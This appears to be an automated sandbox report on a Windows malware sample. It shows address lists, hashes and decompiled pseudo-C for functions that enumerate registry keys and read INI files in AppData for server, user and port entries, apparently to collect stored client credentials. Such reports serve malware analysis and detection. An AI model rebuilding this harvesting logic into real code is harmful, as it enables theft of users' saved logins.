0x00000000
0x00000000
0x0040fcad
0x0040fcc3
0x0040fcc8
0x0040fcca
0x00000000
0x00000000
0x0040fcd0
0x0040fcd6
0x0040fcd6
0x0040fcd8
0x0040fcdc
0x0040fce1
0x0040fce2
0x0040fce5
0x0040fce5
0x0040fcea
0x0040fcf0
0x0040fcf3
0x0040fd0b
0x0040fd0e
0x0040fd11
0x0040fd17
0x0040fd19
0x00000000
0x00000000
0x0040fd31
0x0040fd37
0x0040fd39
0x0040fd3e
0x0040fd3e
0x0040fd44
0x0040fd4a
0x0040fd4d
0x0040fd53
0x0040fd5d
0x0040fd61
0x00000000
0x00000000
0x0040fd67
0x0040fd6b
0x00000000
0x00000000
0x0040fd6b
0x00000000
0x0040fd4d
0x0040fc77
0x0040fc7d
0x0040fc82
0x0040fc84
0x00000000
0x00000000
0x00000000
0x0040fc84
0x0040fc58
0x0040fc5e
0x0040fc63
0x0040fc65
0x00000000
0x00000000
0x00000000
0x0040fc65
0x0040fc3f
0x0040fc44
0x0040fc46
0x00000000
0x00000000
0x00000000
0x0040fc46
0x00000000
0x0040fbb2
0x00000000

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9b7ca07a222f1cc9e5adc34f01add4efe873fc62e82dd73c76d3fdef0c4f197
Instruction ID: 4c275d420296e726cfac787bfccd4499973562296ff6e4c69680185edaf64be6
Opcode Fuzzy Hash: a9b7ca07a222f1cc9e5adc34f01add4efe873fc62e82dd73c76d3fdef0c4f197
Instruction Fuzzy Hash: 16B1B571900609AADB20EF55C841BFEB7B5FF04304F00453BF952B6A92D778E989CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00414949, Relevance: 6.2, APIs: 4, Instructions: 184
registryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00414949(char* __ecx, void* __edx, void* __eflags) {
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				int _v20;
				int _v24;
				intOrPtr _v28;
				char _v32;
				char* _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v68;
				char _v88;
				char _v108;
				char _v132;
				char _v172;
				short _v260;
				short _v780;
				void* __edi;
				void* __esi;
				intOrPtr _t65;
				intOrPtr _t92;
				int _t104;
				void* _t110;
				intOrPtr _t112;
				void* _t115;
				int _t120;
				void* _t125;
				void* _t132;
				void* _t135;
				void* _t136;

				_t119 = __edx;
				_t118 = __ecx;
				_t120 = 0;
				E004164D4( &_v32,  &_v32, 0, 8);
				_t65 = E004163F1(0xc1c);
				_v16 = _t65;
				if(_t65 == 0) {
					L22:
					if(_v28 <= _t120) {
						return E00416421(_v32);
					}
					return E0041252D(_t119, _v32, 0xcb);
				} else {
					_v36 = _t65 + 0x3fc;
					_v48 = 0x80000001;
					_v44 = 0x80000002;
					E004159A4(0x8a,  &_v260);
					E004159A4(0x8b,  &_v88);
					E004159A4(0x8c,  &_v132);
					E004159A4(0x8d,  &_v68);
					E004159A4(0x8e,  &_v108);
					_v12 = 0;
					do {
						if(RegOpenKeyExW( *(_t135 + _v12 * 4 - 0x2c),  &_v260, _t120, 8,  &_v8) != 0) {
							goto L20;
						}
						_v24 = _t120;
						_v20 = 0x104;
						if(RegEnumKeyExW(_v8, _t120,  &_v780,  &_v20, _t120, _t120, _t120, _t120) != 0) {
							L19:
							RegCloseKey(_v8);
							goto L20;
						} else {
							goto L4;
						}
						L17:
						_v20 = 0x104;
						if(RegEnumKeyExW(_v8, _v24,  &_v780,  &_v20, 0, 0, 0, 0) == 0) {
							L4:
							_t122 = _v16;
							_v24 = _v24 + 1;
							_t92 = E0041A545(_v8, _t118, _v16,  &_v780,  &_v88, 0xff);
							_v40 = _t92;
							if(_t92 != 0xffffffff && _t92 != 0) {
								_t132 = E0041A545(_v8, _t118, _t122 + 0x1fe,  &_v780,  &_v68, 0xff);
								if(_t132 != 0xffffffff && _t132 != 0) {
									_t124 = _v36;
									_t104 = E0041A545(_v8, _t118, _v36,  &_v780,  &_v108, 0xff);
									_v20 = _t104;
									if(_t104 != 0xffffffff && _t104 != 0 && E0041488F(_t119, _t124, _t132 + _v40) > 0) {
										_t125 = E0041A5FB(_v8, _t118,  &_v780,  &_v132);
										if(_t125 < 1 || _t125 > 0xffff) {
											_t125 = 0x15;
										}
										_t134 =  &_v172;
										_t110 = 0x55;
										E004159A4(_t110,  &_v172);
										_t112 = _v16;
										_t118 = _v36;
										_push(_t125);
										_push(_t112);
										_push(_t118);
										_push(_t112 + 0x1fe);
										_t119 = 0x311;
										_t126 = _t118 + 0x1fe;
										_t115 = E00417114(_t134, 0x311, _t118 + 0x1fe, _t134);
										_t136 = _t136 + 0x14;
										if(_t115 > 0) {
											_t118 =  &_v32;
											if(E00416815(_t115,  &_v32, _t126) != 0) {
												_v28 = _v28 + 1;
											}
										}
									}
								}
							}
							goto L17;
						} else {
							_t120 = 0;
							goto L19;
						}
						L20:
						_v12 = _v12 + 1;
					} while (_v12 < 2);
					E00416421(_v16);
					goto L22;
				}
			}

0x00414949
0x00414949
0x00414957
0x0041495e
0x00414968
0x0041496d
0x00414972
0x00414b6b
0x00414b6e
0x00000000
0x00414b87
0x00000000
0x00414978
0x0041497d
0x0041498b
0x00414992
0x00414999
0x004149a6
0x004149b3
0x004149c0
0x004149cd
0x004149d2
0x004149da
0x004149f7
0x00000000
0x00000000
0x00414a10
0x00414a13
0x00414a22
0x00414b4d
0x00414b50
0x00000000
0x00000000
0x00000000
0x00000000
0x00414b1f
0x00414b33
0x00414b45
0x00414a28
0x00414a28
0x00414a2b
0x00414a3d
0x00414a42
0x00414a48
0x00414a70
0x00414a75
0x00414a83
0x00414a95
0x00414a9a
0x00414aa0
0x00414ac6
0x00414acb
0x00414ad7
0x00414ad7
0x00414ada
0x00414ae0
0x00414ae1
0x00414ae6
0x00414ae9
0x00414aec
0x00414aed
0x00414aee
0x00414af4
0x00414af8
0x00414afd
0x00414b03
0x00414b08
0x00414b0d
0x00414b10
0x00414b1a
0x00414b1c
0x00414b1c
0x00414b1a
0x00414b0d
0x00414aa0
0x00414a75
0x00000000
0x00414b4b
0x00414b4b
0x00000000
0x00414b4b
0x00414b56
0x00414b56
0x00414b59
0x00414b66
0x00000000
0x00414b66

APIs

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008,?,00000000,00000001), ref: 004149EF
RegEnumKeyExW.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000001), ref: 00414A1A
RegCloseKey.ADVAPI32(?,?,00000000,00000001), ref: 00414B50

Part of subcall function 0041A545: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0040754A,?,?,00000104,.exe,00000000), ref: 0041A55A

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF,?,00000000,00000001), ref: 00414B3D

Part of subcall function 0041A545: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,0040754A,?,?,00000104), ref: 0041A5DB

Part of subcall function 0041A5FB: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,0041130C,?,?), ref: 0041A613

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Open$Enum$CloseEnvironmentExpandStrings
String ID:
API String ID: 2343474859-0
Opcode ID: 07a0b63cc508d11d339d59382726804073fc4fda48303474637d0f48fce4972b
Instruction ID: 6a2039ff496709f9cec192769eaa7951ec49cea9462ed4d8c262523992bfbf24
Opcode Fuzzy Hash: 07a0b63cc508d11d339d59382726804073fc4fda48303474637d0f48fce4972b
Instruction Fuzzy Hash: B3518D72E00118ABDB10DBA9CD45AEFB7BCEF84314F10016AE914F7251DB38AE85CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00414EDD, Relevance: 6.2, APIs: 4, Instructions: 176
registryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00414EDD(char* __ecx, void* __eflags) {
				void* _v8;
				int _v12;
				intOrPtr _v16;
				int* _v20;
				intOrPtr _v24;
				char _v28;
				char* _v32;
				char _v40;
				char _v52;
				char _v64;
				char _v76;
				char _v116;
				short _v180;
				short _v700;
				void* __edi;
				void* __esi;
				intOrPtr _t55;
				int _t81;
				int _t89;
				int _t93;
				void* _t99;
				intOrPtr _t101;
				void* _t104;
				int* _t109;
				char* _t113;
				void* _t114;
				void* _t122;

				_t107 = __ecx;
				_t109 = 0;
				E004164D4( &_v28,  &_v28, 0, 8);
				_t55 = E004163F1(0xc1c);
				_v16 = _t55;
				if(_t55 == 0) {
					return _t55;
				}
				_v32 = _t55 + 0x3fc;
				E004159A4(0x97,  &_v180);
				E004159A4(0x98,  &_v64);
				E004159A4(0x99,  &_v76);
				E004159A4(0x9a,  &_v52);
				E004159A4(0x9b,  &_v40);
				if(RegOpenKeyExW(0x80000001,  &_v180, 0, 8,  &_v8) != 0) {
					L20:
					E00416421(_v16);
					if(_v24 <= _t109) {
						return E00416421(_v28);
					}
					return E0041252D(0x311, _v28, 0xcb);
				}
				_v20 = 0;
				_v12 = 0x104;
				if(RegEnumKeyExW(_v8, 0,  &_v700,  &_v12, 0, 0, 0, 0) != 0) {
					L19:
					RegCloseKey(_v8);
					goto L20;
				} else {
					do {
						_t111 = _v16;
						_v20 = _v20 + 1;
						_t81 = E0041A545(_v8, _t107, _v16,  &_v700,  &_v64, 0xff);
						_v12 = _t81;
						if(_t81 != 0xffffffff && _t81 != 0) {
							_t89 = E0041A545(_v8, _t107, _t111 + 0x1fe,  &_v700,  &_v52, 0xff);
							_v12 = _t89;
							if(_t89 != 0xffffffff && _t89 != 0) {
								_t113 = _v32;
								_t93 = E0041A545(_v8, _t107, _t113,  &_v700,  &_v40, 0xff);
								_v12 = _t93;
								if(_t93 != 0xffffffff && _t93 != 0) {
									_t107 = _t113;
									if(E00416F70(_t113) > 0) {
										_t114 = E0041A5FB(_v8, _t107,  &_v700,  &_v76);
										if(_t114 < 1 || _t114 > 0xffff) {
											_t114 = 0x15;
										}
										_t121 =  &_v116;
										_t99 = 0x55;
										E004159A4(_t99,  &_v116);
										_t101 = _v16;
										_t107 = _v32;
										_push(_t114);
										_push(_t101);
										_push(_t107);
										_push(_t101 + 0x1fe);
										_t115 = _t107 + 0x1fe;
										_t104 = E00417114(_t121, 0x311, _t107 + 0x1fe, _t121);
										_t122 = _t122 + 0x14;
										if(_t104 > 0) {
											_t107 =  &_v28;
											if(E00416815(_t104,  &_v28, _t115) != 0) {
												_v24 = _v24 + 1;
											}
										}
									}
								}
							}
						}
						_v12 = 0x104;
					} while (RegEnumKeyExW(_v8, _v20,  &_v700,  &_v12, 0, 0, 0, 0) == 0);
					_t109 = 0;
					goto L19;
				}
			}

0x00414edd
0x00414eeb
0x00414ef2
0x00414efc
0x00414f01
0x00414f06
0x00415100
0x00415100
0x00414f11
0x00414f1f
0x00414f2c
0x00414f39
0x00414f46
0x00414f53
0x00414f73
0x004150d3
0x004150d6
0x004150de
0x00000000
0x004150f7
0x00000000
0x004150ed
0x00414f8c
0x00414f8f
0x00414f9e
0x004150ca
0x004150cd
0x00000000
0x00414fa4
0x00414fa9
0x00414fa9
0x00414fac
0x00414fbe
0x00414fc3
0x00414fc9
0x00414fec
0x00414ff1
0x00414ff7
0x00415005
0x00415017
0x0041501c
0x00415022
0x00415028
0x00415031
0x00415046
0x0041504b
0x00415057
0x00415057
0x0041505a
0x0041505d
0x0041505e
0x00415063
0x00415066
0x00415069
0x0041506a
0x0041506b
0x00415071
0x0041507a
0x00415080
0x00415085
0x0041508a
0x0041508d
0x00415097
0x00415099
0x00415099
0x00415097
0x0041508a
0x00415031
0x00415022
0x00414ff7
0x004150b0
0x004150c0
0x004150c8
0x00000000
0x004150c8

APIs

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008,?,00000000,00000001), ref: 00414F6B
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,00000001), ref: 00414F96
RegCloseKey.ADVAPI32(?,?,00000000,00000001), ref: 004150CD

Part of subcall function 0041A545: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0040754A,?,?,00000104,.exe,00000000), ref: 0041A55A

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF,?,00000000,00000001), ref: 004150BA

Part of subcall function 0041A545: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,0040754A,?,?,00000104), ref: 0041A5DB

Part of subcall function 0041A5FB: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,0041130C,?,?), ref: 0041A613

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Open$Enum$CloseEnvironmentExpandStrings
String ID:
API String ID: 2343474859-0
Opcode ID: f95dd0abaf67e3b04cb39ecfe929715c0cbcc335c7fbfe7b28f952f2fa6c0c6a
Instruction ID: 3724fb91bc42f93588746571fdf883a59e8d16d1d48bead01637dea5031db389
Opcode Fuzzy Hash: f95dd0abaf67e3b04cb39ecfe929715c0cbcc335c7fbfe7b28f952f2fa6c0c6a
Instruction Fuzzy Hash: 6B515372D00518EBDB20DBE9CD45AEFBBBCEF88304F100166B519E7251DB389E858B65

Uniqueness

Uniqueness Score: -1.00%

Function 0040C50C, Relevance: 6.1, APIs: 4, Instructions: 129
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0040C50C(void* __eflags, intOrPtr _a4) {
				signed int _v5;
				short _v20;
				char _v40;
				char _v60;
				short _v84;
				char _v112;
				char _v144;
				short _v664;
				char _v1184;
				short _v1704;
				char _v2224;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t31;
				long _t33;
				void* _t36;
				void* _t42;
				void* _t44;
				void* _t46;
				long _t50;
				short* _t58;
				char* _t65;
				short _t66;
				void* _t67;
				WCHAR* _t70;
				long _t77;

				_t31 = 0x2a;
				E004159A4(_t31,  &_v144);
				_t33 =  &_v1184;
				__imp__SHGetFolderPathW(0, 0x1a, 0, 0, _t33);
				if(_t33 == 0) {
					_t33 = E0041BCB4( &_v144,  &_v1184,  &_v1184);
					if(_t33 != 0) {
						_t36 = 0x2c;
						E004159A4(_t36,  &_v112);
						_t33 = E0041BCB4( &_v112,  &_v1704,  &_v1184);
						if(_t33 != 0) {
							_t33 = GetFileAttributesW( &_v1704);
							if(_t33 != 0xffffffff) {
								_t42 = 0x2d;
								E004159A4(_t42,  &_v60);
								_t44 = 0x2e;
								E004159A4(_t44,  &_v84);
								_t46 = 0x2f;
								E004159A4(_t46,  &_v20);
								_v5 = 0;
								while(1) {
									_push(_v5 & 0x000000ff);
									_push( &_v60);
									_t67 = 0xa;
									_t70 =  &_v40;
									_t50 = E00417114( &_v60, _t67, _t70);
									if(_t50 < 1) {
										break;
									}
									_t50 = GetPrivateProfileIntW(_t70,  &_v84, 0xffffffff,  &_v1704);
									_t77 = _t50;
									if(_t77 == 0xffffffff) {
										break;
									}
									_t50 = GetPrivateProfileStringW(_t70,  &_v20, 0,  &_v664, 0x104,  &_v1704);
									if(_t50 == 0) {
										L17:
										_v5 = _v5 + 1;
										if(_v5 < 0xfa) {
											continue;
										}
										break;
									}
									_t58 =  &_v664;
									if(_v664 == 0) {
										L12:
										if(_t77 != 1) {
											_t65 =  &_v664;
											L16:
											_t50 = E0040C693(0, _t65, _a4, _t90);
											if(_t50 == 0) {
												break;
											}
											goto L17;
										}
										_t50 = E0041BCB4( &_v664,  &_v2224,  &_v1184);
										_t90 = _t50;
										if(_t50 == 0) {
											goto L17;
										}
										_t65 =  &_v2224;
										goto L16;
									} else {
										goto L9;
									}
									do {
										L9:
										if( *_t58 == 0x2f) {
											_t66 = 0x5c;
											 *_t58 = _t66;
										}
										_t58 = _t58 + 2;
									} while ( *_t58 != 0);
									goto L12;
								}
								return _t50;
							}
						}
					}
				}
				return _t33;
			}

0x0040c51f
0x0040c520
0x0040c525
0x0040c533
0x0040c53b
0x0040c54b
0x0040c552
0x0040c55d
0x0040c55e
0x0040c573
0x0040c57a
0x0040c587
0x0040c590
0x0040c59b
0x0040c59c
0x0040c5a6
0x0040c5a7
0x0040c5b1
0x0040c5b2
0x0040c5b7
0x0040c5bb
0x0040c5bf
0x0040c5c3
0x0040c5c6
0x0040c5c7
0x0040c5ca
0x0040c5d4
0x00000000
0x00000000
0x0040c5ea
0x0040c5f0
0x0040c5f5
0x00000000
0x00000000
0x0040c616
0x0040c61e
0x0040c67f
0x0040c67f
0x0040c686
0x00000000
0x00000000
0x00000000
0x0040c686
0x0040c620
0x0040c62d
0x0040c643
0x0040c646
0x0040c66d
0x0040c673
0x0040c676
0x0040c67d
0x00000000
0x00000000
0x00000000
0x0040c67d
0x0040c65c
0x0040c661
0x0040c663
0x00000000
0x00000000
0x0040c665
0x00000000
0x00000000
0x00000000
0x00000000
0x0040c62f
0x0040c62f
0x0040c633
0x0040c637
0x0040c638
0x0040c638
0x0040c63b
0x0040c63e
0x00000000
0x0040c62f
0x00000000
0x0040c68c
0x0040c590
0x0040c57a
0x0040c552
0x0040c690

APIs

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,00000000), ref: 0040C533

Part of subcall function 0041BCB4: PathCombineW.SHLWAPI(?,a@,?,004061E6,?,?), ref: 0041BCD3

GetFileAttributesW.KERNEL32(?,?,?,?,?), ref: 0040C587
GetPrivateProfileIntW.KERNEL32 ref: 0040C5EA
GetPrivateProfileStringW.KERNEL32 ref: 0040C616

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: PathPrivateProfile$AttributesCombineFileFolderString
String ID:
API String ID: 1702184609-0
Opcode ID: ee5d60e2560c634b6b622bb7fc6e87deec0f4774699dd7827841687ae993e67d
Instruction ID: 6c9a07ca21c5a1004193c82a9f172541fb47996a04247cf43e65891ec3d9a4f2
Opcode Fuzzy Hash: ee5d60e2560c634b6b622bb7fc6e87deec0f4774699dd7827841687ae993e67d
Instruction Fuzzy Hash: 7241B3B2900118EADF20EBA48D85EEEB37CAF45354F0006A7E508F71D1D7759E898B69

Uniqueness

Uniqueness Score: -1.00%

Function 0041C3E6, Relevance: 6.1, APIs: 4, Instructions: 84
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041C3E6(signed int __edx, void** __esi, void* _a4, signed int _a8) {
				char _v5;
				long _v12;
				void _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _t26;
				signed int _t29;
				signed int _t46;
				void** _t48;

				_t48 = __esi;
				_t46 = __edx;
				_v5 = 0;
				if(_a8 <= 0xa00000) {
					_t26 = E0041B72E( *__esi);
					_v36 = _t26;
					_v32 = _t46;
					if((_t26 & _t46) != 0xffffffff && E0041B70E( *__esi, 0, 0, 2) != 0) {
						_t29 = E0041B72E( *__esi);
						_v28 = _t29;
						_v24 = _t46;
						if((_t29 & _t46) != 0xffffffff) {
							E004164D4( &_v20,  &_v20, 0, 5);
							_v20 = __esi[4] ^ _a8;
							if(WriteFile( *__esi,  &_v20, 5,  &_v12, 0) == 0 || _v12 != 5 || WriteFile( *__esi, _a4, _a8,  &_v12, 0) == 0 || _v12 != _a8) {
								E0041B70E( *_t48, _v28, _v24, 0);
								SetEndOfFile( *_t48);
							} else {
								_v5 = 1;
							}
						}
						FlushFileBuffers( *_t48);
						E0041B70E( *_t48, _v36, _v32, 0);
					}
				}
				return _v5;
			}

0x0041c3e6
0x0041c3e6
0x0041c3f7
0x0041c3fa
0x0041c402
0x0041c407
0x0041c40c
0x0041c412
0x0041c42d
0x0041c432
0x0041c437
0x0041c43d
0x0041c446
0x0041c458
0x0041c46b
0x0041c49d
0x0041c4a4
0x0041c48e
0x0041c48e
0x0041c48e
0x0041c46b
0x0041c4ac
0x0041c4bb
0x0041c4bb
0x0041c412
0x0041c4c6

APIs

Part of subcall function 0041B72E: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,004050ED,?,?,?), ref: 0041B743

Part of subcall function 0041B70E: SetFilePointerEx.KERNEL32(?,?,?,00000000,?,0041C51A,?,?,00000000,00000001,?,004050ED,?,?,?), ref: 0041B720

WriteFile.KERNEL32(?,?,00000005,00000000,00000000,?,00000000,00000005,?,?,00000000,00000000,00000002,?,00000000,00000000), ref: 0041C467
WriteFile.KERNEL32(?,00000005,00A00000,00000005,00000000), ref: 0041C480
SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 0041C4A4
FlushFileBuffers.KERNEL32(?,?,?,00000000,00000000,00000002,?,00000000,00000000), ref: 0041C4AC

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: File$PointerWrite$BuffersFlush
String ID:
API String ID: 1289656144-0
Opcode ID: b919c28aed449f5b455f04681dfafc2e00bea7100fefa930c18e3d1abca66a8a
Instruction ID: a4c3ee71f44642aa1bee8d82d57362cc840c333c05c167429744d83dfaefd4d0
Opcode Fuzzy Hash: b919c28aed449f5b455f04681dfafc2e00bea7100fefa930c18e3d1abca66a8a
Instruction Fuzzy Hash: 8D317C76804108EEDF119FA4CC81EFEBBB9FF48348F14892AF150A51A5D33A8994DB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040938F, Relevance: 6.1, APIs: 4, Instructions: 69
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040938F(void* __ebx, void* __ecx) {
				char _v20;
				char* _v84;
				char _v92;
				char _v196;
				char _v716;
				void* __edi;
				void* __esi;
				void* _t15;
				void* _t31;
				void* _t35;
				void* _t36;
				char _t37;
				void** _t43;

				_t36 = __ecx;
				_t35 = __ebx;
				_t15 =  *(__ebx + 0x180);
				if(_t15 == 0 || WaitForSingleObject(_t15, 0) != 0x102) {
					_t2 = _t35 + 0x17c; // 0x17c
					_t43 = _t2;
					E00417E30(_t43);
					E00406AB8(_t36,  &_v716, _t43, 1);
					E00406762(0x2937498d,  &_v196, 0);
					_t37 = 0x44;
					E004164D4( &_v92,  &_v92, 0, _t37);
					_v92 = _t37;
					_v84 =  &_v196;
					ResetEvent( *(_t35 + 0xc));
					if(E00417CE8( &_v716, L"-v", 0,  &_v92,  &_v20) != 0) {
						E0041645D(_t43,  &_v20, 0x10);
						if(WaitForSingleObject( *(_t35 + 0xc), 0x3e8) == 0) {
							goto L6;
						} else {
							TerminateProcess( *_t43, 0);
							E00417E30(_t43);
							goto L3;
						}
					} else {
						L3:
						_t31 = 0;
					}
				} else {
					L6:
					_t31 = 1;
				}
				return _t31;
			}

0x0040938f
0x0040938f
0x00409392
0x004093a2
0x004093b8
0x004093b8
0x004093be
0x004093cb
0x004093df
0x004093e6
0x004093ed
0x004093fb
0x004093fe
0x00409401
0x00409423
0x00409430
0x00409445
0x00000000
0x00409447
0x0040944a
0x00409450
0x00000000
0x00409450
0x00409425
0x00409425
0x00409425
0x00409425
0x00409457
0x00409457
0x00409457
0x00409457
0x0040945c

APIs

WaitForSingleObject.KERNEL32(?,00000000,?,74B5F6F0), ref: 004093A7
ResetEvent.KERNEL32(?,?,00000000,00000044,2937498D,?,00000000,00000001,?,74B5F6F0), ref: 00409401
WaitForSingleObject.KERNEL32(?,000003E8,0000017C,?,00000010,?,00403340,00000000,?,?,?,74B5F6F0), ref: 0040943D
TerminateProcess.KERNEL32(0000017C,00000000,?,74B5F6F0), ref: 0040944A

Part of subcall function 00417E30: CloseHandle.KERNEL32(00000000,74B5F560,004083DE,00000000,00422E10,00000000,00408510,00000000,00000000), ref: 00417E3F
Part of subcall function 00417E30: CloseHandle.KERNEL32(00000000,74B5F560,004083DE,00000000,00422E10,00000000,00408510,00000000,00000000), ref: 00417E48

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandleObjectSingleWait$EventProcessResetTerminate
String ID:
API String ID: 401097067-0
Opcode ID: 05c2e9a346c3f8d7005e759078caa7d88eed59f7b54017950ac3717cc000accb
Instruction ID: 87de9f73cc55572cfa4e98070ffe2a7e3f6caf6b49dd1d2913febd4432e31a04
Opcode Fuzzy Hash: 05c2e9a346c3f8d7005e759078caa7d88eed59f7b54017950ac3717cc000accb
Instruction Fuzzy Hash: 9A11A271500208AAEB10AFE5DD49FEF7BBDEF40704F00417AF904F6096DA389946CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040EAF8, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 59
stringCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040EAF8(void* __eax, void* __ebx, void* __edx, intOrPtr _a4) {
				short _v44;
				char _v134;
				char _v408;
				char _v532;
				void* _t22;
				WCHAR* _t27;
				WCHAR* _t29;
				void* _t34;
				int _t36;
				void* _t37;
				WCHAR* _t39;
				void* _t48;

				_t34 = __ebx - __ebx;
				0xeccc40c2();
				 *((intOrPtr*)(_t34 + 0x56)) =  *((intOrPtr*)(_t34 + 0x56)) + __edx;
				E0041645D(0x422bc8, _a4, 0x1e6);
				E00406A66(_t37,  &_v532);
				if(E00416492( &_v408, 0x422bb8, 0x10) != 0) {
					L8:
					_t22 = 0;
				} else {
					_t39 =  *0x42299c; // 0x0
					_a4 = E00416F70(_t39);
					_t36 = E00416F70(0x4229a0);
					E0041662C(_t24 | 0xffffffff,  &_v134,  &_v44, 0, 0x14);
					if(_a4 <= _t36) {
						goto L8;
					} else {
						_t27 =  *0x42299c; // 0x0
						_t48 = _t36 + _t36;
						if( *((short*)(_t48 + _t27)) != 0x5c || StrCmpNIW(0x4229a0, _t27, _t36) != 0) {
							goto L8;
						} else {
							_t29 =  *0x42299c; // 0x0
							if(lstrcmpiW( &_v44, _t48 +  &(_t29[1])) != 0) {
								goto L8;
							} else {
								_t22 = 1;
							}
						}
					}
				}
				return _t22;
			}

0x0040eaf8
0x0040eafa
0x0040eb04
0x0040eb15
0x0040eb21
0x0040eb3a
0x0040ebaa
0x0040ebaa
0x0040eb3c
0x0040eb3c
0x0040eb4e
0x0040eb58
0x0040eb68
0x0040eb70
0x00000000
0x0040eb72
0x0040eb72
0x0040eb77
0x0040eb7f
0x00000000
0x0040eb8e
0x0040eb8e
0x0040eba4
0x00000000
0x0040eba6
0x0040eba6
0x0040eba6
0x0040eba4
0x0040eb7f
0x0040eb70
0x0040ebb0

APIs

Part of subcall function 0041662C: MultiByteToWideChar.KERNEL32(00406B14,00000000,?,00406293,?,?,00406B14,00000000,00000032,77E49EB0,?,00000000), ref: 00416643

StrCmpNIW.SHLWAPI(004229A0,00000000,00000000,00000000,00000014,00000010,?,00422BC8,?,000001E6,36D62AA8,?,000000B7), ref: 0040EB84
lstrcmpiW.KERNEL32(?,?), ref: 0040EB9C

Strings

Cy, xrefs: 0040EB15
Zy, xrefs: 0040EB33

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWidelstrcmpi
String ID: Cy$Zy
API String ID: 1977948566-282925538
Opcode ID: 88cf9c434f92cf7fc4b04606503d0a33092c9ed9318d7d758d676cba07f1480e
Instruction ID: 70db405e173d3338e7f1361d82b57a46ea416e25bb8cab9425b6c2b25967f9ec
Opcode Fuzzy Hash: 88cf9c434f92cf7fc4b04606503d0a33092c9ed9318d7d758d676cba07f1480e
Instruction Fuzzy Hash: F911B671B10118ABDF20EF62DC45EEA7778AB94354F44843BF902A71D0D678E982CB2D

Uniqueness

Uniqueness Score: -1.00%

Function 0040EAFC, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 59
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

